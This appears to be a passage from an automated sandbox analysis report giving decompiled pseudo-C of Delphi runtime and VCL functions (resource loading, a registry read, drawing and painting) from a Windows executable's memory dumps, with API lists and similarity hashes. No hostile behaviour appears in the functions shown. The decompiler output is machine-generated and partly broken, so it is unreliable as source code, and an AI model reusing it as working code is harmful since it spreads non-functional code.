				_t28 = _t27 + 0xfffffff8;
				_t8 =  *0x4bae44; // 0x4bc030
				if( *_t8 == 0) {
					 *_t28 = 0;
					_t10 =  *0x4bb148; // 0x4a0034
					_v12 =  *_t10;
					if(_v12 != 0) {
						while(1) {
							_t26 =  *(_v12 + 4);
							 *_t28 = LoadResource(_t26, FindResourceA(_t26, "DVCLAL", 0xa));
							if( *_t28 != 0) {
								goto L5;
							}
							_v12 =  *_v12;
							if(_v12 != 0) {
								continue;
							}
							goto L5;
						}
					}
				} else {
					_t17 =  *0x4bae44; // 0x4bc030
					_t19 = FindResourceA( *_t17, "DVCLAL", 0xa);
					_t20 =  *0x4bae44; // 0x4bc030
					 *_t28 = LoadResource( *_t20, _t19);
				}
				L5:
				return  *_t28;
			}

0x0040e27e
0x0040e281
0x0040e289
0x0040e2b4
0x0040e2b7
0x0040e2be
0x0040e2c7
0x0040e2c9
0x0040e2d4
0x0040e2e4
0x0040e2eb
0x00000000
0x00000000
0x0040e2f3
0x0040e2fc
0x00000000
0x00000000
0x00000000
0x0040e2fc
0x0040e2c9
0x0040e28b
0x0040e292
0x0040e29a
0x0040e2a0
0x0040e2ad
0x0040e2ad
0x0040e2fe
0x0040e305

APIs

FindResourceA.KERNEL32 ref: 0040E29A
LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A), ref: 0040E2A8
FindResourceA.KERNEL32 ref: 0040E2D8
LoadResource.KERNEL32(?,00000000,?,DVCLAL,0000000A), ref: 0040E2DF

Strings

DVCLAL, xrefs: 0040E28D, 0040E2CF

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoad
String ID: DVCLAL
API String ID: 2619053042-4101055290
Opcode ID: d204bd14a2e0ee66408747a27a8ac497611e44c554d43372367151b9373ff293
Instruction ID: cb49d3c5f3fc5c2f6b4cb8189aa6aef9e964a8eed3da7b6a6c98e0c10e513989
Opcode Fuzzy Hash: d204bd14a2e0ee66408747a27a8ac497611e44c554d43372367151b9373ff293
Instruction Fuzzy Hash: 4111F774608310EFD310EB69C985B5A77E8EB49714F01487EF485AB3E0C7789C50DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00403478, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00403478() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x4a0020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x4a0020; // 0x1372
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x4a0020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E004034E9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4034f0);
					return RegCloseKey(_v8);
				}
			}

0x00403479
0x0040347b
0x00403485
0x004034a1
0x004034f0
0x00403502
0x00403505
0x0040350e
0x004034a3
0x004034a5
0x004034a6
0x004034ab
0x004034ae
0x004034b1
0x004034cd
0x004034d4
0x004034d7
0x004034da
0x004034e8
0x004034e8

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040349A
RegQueryValueExA.ADVAPI32 ref: 004034CD
RegCloseKey.ADVAPI32(?), ref: 004034E3

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 00403490
FPUMaskValue, xrefs: 004034C4

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 922a424f1b6665b063de74352bf787c5a4fa1408f7364e2ef6a2d45f96a76b2b
Instruction ID: 93877b4532e35da09450cc135ee1be1996d0c3ff18c7b21d8caccd55e56241c7
Opcode Fuzzy Hash: 922a424f1b6665b063de74352bf787c5a4fa1408f7364e2ef6a2d45f96a76b2b
Instruction Fuzzy Hash: 4D017575944308BAE711DFA0DC42FA97BACE709705F6000B6BE00E65D1F6795A10D75C

Uniqueness

Uniqueness Score: -1.00%

Function 00415558, Relevance: 7.8, APIs: 5, Instructions: 334
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00415558(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed int _v12;
				char _v13;
				signed int _v16;
				signed int _v18;
				void* _v24;
				void* _v28;
				signed int _v44;
				void* __ebp;
				signed short _t136;
				signed short* _t256;
				intOrPtr _t307;
				intOrPtr _t310;
				intOrPtr _t318;
				intOrPtr _t325;
				intOrPtr _t333;
				signed int _t338;
				void* _t346;
				void* _t348;
				intOrPtr _t349;

				_t353 = __fp0;
				_t346 = _t348;
				_t349 = _t348 + 0xffffffd8;
				_v12 = __ecx;
				_v8 = __edx;
				_t256 = __eax;
				_v13 = 1;
				_t338 =  *((intOrPtr*)(__eax));
				if((_t338 & 0x00000fff) >= 0x10f) {
					_t136 =  *_v8;
					if(_t136 != 0) {
						if(_t136 != 1) {
							if(E00417934(_t338,  &_v24) != 0) {
								_push( &_v18);
								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
									_t341 =  *_v8;
									if(( *_v8 & 0x00000fff) >= 0x10f) {
										if(E00417934(_t341,  &_v28) != 0) {
											_push( &_v16);
											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
												E0040FF8C(0xb);
												goto L46;
											} else {
												if( *_t256 == _v16) {
													_v13 =  *((intOrPtr*)(0x4a048c + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
													goto L46;
												} else {
													_push( &_v44);
													L0040EEB8();
													_push(_t346);
													_push(0x415939);
													_push( *[fs:eax]);
													 *[fs:eax] = _t349;
													_t268 = _v16 & 0x0000ffff;
													E00410FB0( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
													if(_v44 != _v16) {
														E0040FE9C(_t268);
													}
													_v13 =  *((intOrPtr*)(0x4a048c + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
													_pop(_t307);
													 *[fs:eax] = _t307;
													_push(0x41596c);
													return E00410728( &_v44);
												}
											}
										} else {
											E0040FF8C(0xb);
											goto L46;
										}
									} else {
										_push( &_v44);
										L0040EEB8();
										_push(_t346);
										_push(0x415883);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t273 =  *_v8 & 0x0000ffff;
										E00410FB0( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
										if( *_v8 != _v44) {
											E0040FE9C(_t273);
										}
										_v13 = E004153CC( &_v44, _v12, _v8, _t353);
										_pop(_t310);
										 *[fs:eax] = _t310;
										_push(0x41596c);
										return E00410728( &_v44);
									}
								} else {
									if( *_v8 == _v18) {
										_v13 =  *((intOrPtr*)(0x4a048c + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L0040EEB8();
										_push(_t346);
										_push(0x4157e1);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t278 = _v18 & 0x0000ffff;
										E00410FB0( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
										if(_v44 != _v18) {
											E0040FE9C(_t278);
										}
										_v13 =  *((intOrPtr*)(0x4a048c + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t318);
										 *[fs:eax] = _t318;
										_push(0x41596c);
										return E00410728( &_v44);
									}
								}
							} else {
								E0040FF8C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E004151AC(_v12, 2);
							goto L46;
						}
					} else {
						_v13 = E00415198(0, 1);
						goto L46;
					}
				} else {
					if(_t338 != 0) {
						if(_t338 != 1) {
							if(E00417934( *_v8,  &_v28) != 0) {
								_push( &_v16);
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_push( &_v44);
									L0040EEB8();
									_push(_t346);
									_push(0x4156f1);
									_push( *[fs:eax]);
									 *[fs:eax] = _t349;
									_t284 =  *_t256 & 0x0000ffff;
									E00410FB0( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
									if((_v44 & 0x00000fff) !=  *_t256) {
										E0040FE9C(_t284);
									}
									_v13 = E004153CC(_t256, _v12,  &_v44, _t353);
									_pop(_t325);
									 *[fs:eax] = _t325;
									_push(0x41596c);
									return E00410728( &_v44);
								} else {
									if( *_t256 == _v16) {
										_v13 =  *((intOrPtr*)(0x4a048c + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L0040EEB8();
										_push(_t346);
										_push(0x415663);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t289 = _v16 & 0x0000ffff;
										E00410FB0( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
										if((_v44 & 0x00000fff) != _v16) {
											E0040FE9C(_t289);
										}
										_v13 =  *((intOrPtr*)(0x4a048c + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t333);
										 *[fs:eax] = _t333;
										_push(0x41596c);
										return E00410728( &_v44);
									}
								}
							} else {
								E0040FF8C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E004151AC(_v12, 0);
							goto L46;
						}
					} else {
						_v13 = E00415198(1, 0);
						L46:
						return _v13;
					}
				}
			}

0x00415558
0x00415559
0x0041555b
0x00415560
0x00415563
0x00415566
0x00415568
0x0041556c
0x00415579
0x004156fb
0x00415701
0x0041571b
0x0041573d
0x0041574c
0x0041575f
0x00415815
0x00415822
0x00415899
0x004158a8
0x004158ba
0x00415967
0x00000000
0x004158c0
0x004158c7
0x00415962
0x00000000
0x004158c9
0x004158cc
0x004158cd
0x004158d4
0x004158d5
0x004158da
0x004158dd
0x004158e0
0x004158e9
0x004158f6
0x004158f8
0x004158f8
0x00415920
0x00415925
0x00415928
0x0041592b
0x00415938
0x00415938
0x004158c7
0x0041589b
0x0041589b
0x00000000
0x0041589b
0x00415824
0x00415827
0x00415828
0x0041582f
0x00415830
0x00415835
0x00415838
0x0041583e
0x00415846
0x00415855
0x00415857
0x00415857
0x0041586a
0x0041586f
0x00415872
0x00415875
0x00415882
0x00415882
0x00415765
0x0041576f
0x0041580a
0x00000000
0x00415771
0x00415774
0x00415775
0x0041577c
0x0041577d
0x00415782
0x00415785
0x00415788
0x00415792
0x0041579f
0x004157a1
0x004157a1
0x004157c8
0x004157cd
0x004157d0
0x004157d3
0x004157e0
0x004157e0
0x0041576f
0x0041573f
0x0041573f
0x00000000
0x0041573f
0x0041571d
0x00415729
0x00000000
0x00415729
0x00415703
0x0041570c
0x00000000
0x0041570c
0x0041557f
0x00415582
0x00415599
0x004155bf
0x004155ce
0x004155e0
0x00415697
0x00415698
0x0041569f
0x004156a0
0x004156a5
0x004156a8
0x004156ab
0x004156b4
0x004156c4
0x004156c6
0x004156c6
0x004156d8
0x004156dd
0x004156e0
0x004156e3
0x004156f0
0x004155e6
0x004155ed
0x0041568c
0x00000000
0x004155ef
0x004155f2
0x004155f3
0x004155fa
0x004155fb
0x00415600
0x00415603
0x00415606
0x0041560f
0x00415620
0x00415622
0x00415622
0x0041564a
0x0041564f
0x00415652
0x00415655
0x00415662
0x00415662
0x004155ed
0x004155c1
0x004155c1
0x00000000
0x004155c1
0x0041559b
0x004155a7
0x00000000
0x004155a7
0x00415584
0x0041558d
0x0041596c
0x00415974
0x00415974
0x00415582

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf131c35df834e9a010ecf6ff43a72b3c71a0114e57c817e5c53f49833bd1baa
Instruction ID: 9e7437ee4a2b1a65b2a14c2387ad9f96a28026aae9e6e3088ce84a9c5d14dde5
Opcode Fuzzy Hash: cf131c35df834e9a010ecf6ff43a72b3c71a0114e57c817e5c53f49833bd1baa
Instruction Fuzzy Hash: 43D1B539A00549DFCB10EF94C4819EDBBB5EF89314F9444A6F800B7751D738AE8ACB69

Uniqueness

Uniqueness Score: -1.00%

Function 00457C3C, Relevance: 7.7, APIs: 5, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00457C3C(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x457e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E00459C14(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E0045B280(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E00404470( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E004047E4(_v16, 0x457e44);
					if(_t153 != 0) {
						E00428D80( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E00428750( *((intOrPtr*)(_v8 + 0xc))) |  *0x457e48;
							E0042875C( *((intOrPtr*)(_v8 + 0xc)), E00428750( *((intOrPtr*)(_v8 + 0xc))) |  *0x457e48, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E00404698(_v16);
							_t65 = E00404898(_v16);
							DrawTextA(E004294DC(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x457e27);
							return E004043D8( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E00428490( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
								_t89 = E00404698(_v16);
								_t91 = E00404898(_v16);
								DrawTextA(E004294DC(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E00428490( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
							} else {
								_t76 = E00427FD0(0xff00000d);
								_t78 = E00427FD0(0xff000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E00428490( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E004294DC(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E004046A0( &_v16, 0x457e38);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}

0x00457c3c
0x00457c3d
0x00457c47
0x00457c4a
0x00457c4d
0x00457c50
0x00457c52
0x00457c57
0x00457c58
0x00457c5d
0x00457c60
0x00457c65
0x00457c6a
0x00457c6e
0x00457c7e
0x00457c8d
0x00457c90
0x00457c95
0x00457c95
0x00457c95
0x00457c80
0x00457c83
0x00457c83
0x00457c98
0x00457c98
0x00457ca4
0x00457cac
0x00457cd2
0x00457cda
0x00457cdf
0x00457d1d
0x00457d22
0x00457d26
0x00457d2b
0x00457d37
0x00457d3f
0x00457d3f
0x00457d44
0x00457d48
0x00457de5
0x00457ded
0x00457df6
0x00457e05
0x00457e0a
0x00457e0c
0x00457e0f
0x00457e12
0x00457e1f
0x00457d4e
0x00457d4e
0x00457d52
0x00457d5c
0x00457d6c
0x00457d79
0x00457d82
0x00457d91
0x00457d9e
0x00457d9e
0x00457da3
0x00457da7
0x00457dd5
0x00457de0
0x00457da9
0x00457dae
0x00457dba
0x00457dbf
0x00457dc1
0x00000000
0x00000000
0x00457dce
0x00457dce
0x00000000
0x00457da7
0x00457d48
0x00457ce4
0x00457cf2
0x00457cf3
0x00457cf4
0x00457cf5
0x00457cf6
0x00457d0b
0x00457d0b
0x00000000
0x00457cae
0x00457cb2
0x00457cc5
0x00457ccd
0x00000000
0x00457ccd
0x00457cba
0x00000000
0x00000000
0x00457cbf
0x00457cc3
0x00000000
0x00000000
0x00000000
0x00457cc3

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00457D0B
OffsetRect.USER32 ref: 00457D5C
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00457D91
OffsetRect.USER32 ref: 00457D9E
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00457E05

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Draw$OffsetRectText$Edge
String ID:
API String ID: 3610532707-0
Opcode ID: 2c86f3ea0eed03be7b2d349a793995695e907d3c5b545792c38e0820bd8b037e
Instruction ID: 86bd18e6a062903fba8e44786a069064b20b7474a81349754dbda688cf155458
Opcode Fuzzy Hash: 2c86f3ea0eed03be7b2d349a793995695e907d3c5b545792c38e0820bd8b037e
Instruction Fuzzy Hash: E151A370A08208AFDB11EFA9D882B9E77E5AF45315F5485BAFD14E7382C73CAD048719

Uniqueness

Uniqueness Score: -1.00%

Function 0044B244, Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0044B244(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				void* _t76;
				intOrPtr _t85;
				void* _t96;
				void* _t97;
				void* _t99;
				void* _t101;
				void* _t102;
				intOrPtr _t103;

				_t101 = _t102;
				_t103 = _t102 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E0044D590(_v8),  &_v84);
				}
				_push(_t101);
				_push(0x44b364);
				_push( *[fs:edx]);
				 *[fs:edx] = _t103;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t96 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t96 >= 0) {
						_t97 = _t96 + 1;
						_t99 = 0;
						do {
							_t64 = E0041C834( *((intOrPtr*)(_v8 + 0x198)), _t76, _t99);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t99 = _t99 + 1;
							_t97 = _t97 - 1;
						} while (_t97 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0044B39C(_v8, 0, _t75);
				_pop(_t85);
				 *[fs:eax] = _t85;
				_push(0x44b36b);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E0044D590(_v8),  &_v84);
				}
				return _t55;
			}

0x0044b245
0x0044b247
0x0044b24d
0x0044b250
0x0044b256
0x0044b25b
0x0044b26f
0x0044b26f
0x0044b273
0x0044b274
0x0044b279
0x0044b27c
0x0044b289
0x0044b2a3
0x0044b2a6
0x0044b2b9
0x0044b2bc
0x0044b2be
0x0044b2bf
0x0044b2c1
0x0044b2cc
0x0044b2d5
0x0044b2e7
0x00000000
0x0044b2e9
0x0044b305
0x0044b30c
0x00000000
0x00000000
0x0044b30c
0x00000000
0x00000000
0x00000000
0x00000000
0x0044b30e
0x0044b30e
0x0044b30f
0x0044b30f
0x0044b2c1
0x0044b312
0x0044b316
0x0044b31f
0x0044b31f
0x0044b32a
0x0044b28b
0x0044b292
0x0044b292
0x0044b336
0x0044b33d
0x0044b340
0x0044b343
0x0044b348
0x0044b34f
0x00000000
0x0044b35e
0x0044b363

APIs

BeginPaint.USER32(00000000,?), ref: 0044B26A
SaveDC.GDI32(?), ref: 0044B29E
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0044B300
RestoreDC.GDI32(?,?), ref: 0044B32A
EndPaint.USER32(00000000,?), ref: 0044B35E

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 02da60cef51731c1bc855ae6051b7a586c728650794ebafa3fb79d1c437d0a0e
Instruction ID: 2776488e99df057887c77d368e8bf2338f9b3d40826eb1038a8dff78df5d4c9a
Opcode Fuzzy Hash: 02da60cef51731c1bc855ae6051b7a586c728650794ebafa3fb79d1c437d0a0e
Instruction Fuzzy Hash: 0B414A70A00604AFDB10DF9AC885AAEB7F9FF48304F1584AAE90497266D778DD40CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0046AA24, Relevance: 7.6, APIs: 5, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0046AA24(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
				struct tagRECT _v20;
				void* __edi;
				void* __ebp;
				int _t17;
				CHAR* _t19;
				int _t31;
				CHAR* _t33;
				int _t43;
				CHAR* _t45;
				void* _t49;
				signed int _t56;
				int _t57;
				void* _t61;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t60 = __ecx;
				_t49 = __edx;
				_t56 = _a4;
				E00428D80( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
				if(_a8 != 1) {
					_t57 = _t56 | 0x00000005;
					__eflags = _t57;
					_t17 = E00404698(__ecx);
					_t19 = E00404898(__ecx);
					return DrawTextA(E004294DC(_t49), _t19, _t17,  &_v20, _t57);
				}
				OffsetRect( &_v20, 1, 1);
				E00428490( *((intOrPtr*)(_t49 + 0xc)), 0xff000014);
				_t31 = E00404698(_t60);
				_t33 = E00404898(_t60);
				DrawTextA(E004294DC(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
				E00428490( *((intOrPtr*)(_t49 + 0xc)), 0xff000010);
				_t43 = E00404698(_t60);
				_t45 = E00404898(_t60);
				return DrawTextA(E004294DC(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
			}

0x0046aa33
0x0046aa34
0x0046aa35
0x0046aa36
0x0046aa37
0x0046aa39
0x0046aa3b
0x0046aa43
0x0046aa4c
0x0046aad4
0x0046aad4
0x0046aade
0x0046aae6
0x00000000
0x0046aaf4
0x0046aa5a
0x0046aa67
0x0046aa78
0x0046aa80
0x0046aa8e
0x0046aa9b
0x0046aaa8
0x0046aab7
0x0046aabf
0x00000000

APIs

OffsetRect.USER32 ref: 0046AA5A
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0046AA8E
OffsetRect.USER32 ref: 0046AA9B
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0046AACD
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0046AAF4

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawText$OffsetRect
String ID:
API String ID: 1886049697-0
Opcode ID: d26dd655861490adfebdf5d0fa9ac4577962b128cdfa5938044a2aef71de8541
Instruction ID: 7793d4d47d01da271cade7b470186595b11da03caba15a77c1a9b6a2e69502f2
Opcode Fuzzy Hash: d26dd655861490adfebdf5d0fa9ac4577962b128cdfa5938044a2aef71de8541
Instruction Fuzzy Hash: 1321A4B1B045256BCB00FAAA9C4199F739C5F45318B054A2BB918F7282EA7DED01876D

Uniqueness

Uniqueness Score: -1.00%

Function 00439888, Relevance: 7.6, APIs: 5, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00439888(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				long _t27;
				long _t34;
				int _t42;
				int _t43;
				intOrPtr _t50;
				int _t54;
				void* _t57;
				void* _t60;

				_v12 = 0;
				_v8 = __ecx;
				_t54 = __edx;
				_t57 = __eax;
				_push(_t60);
				_push(0x439973);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffff8;
				if(__edx >= 0) {
					_t42 = SendMessageA(E0044D590( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
					if(_t42 < 0) {
						_t43 = SendMessageA(E0044D590( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
						if(_t43 >= 0) {
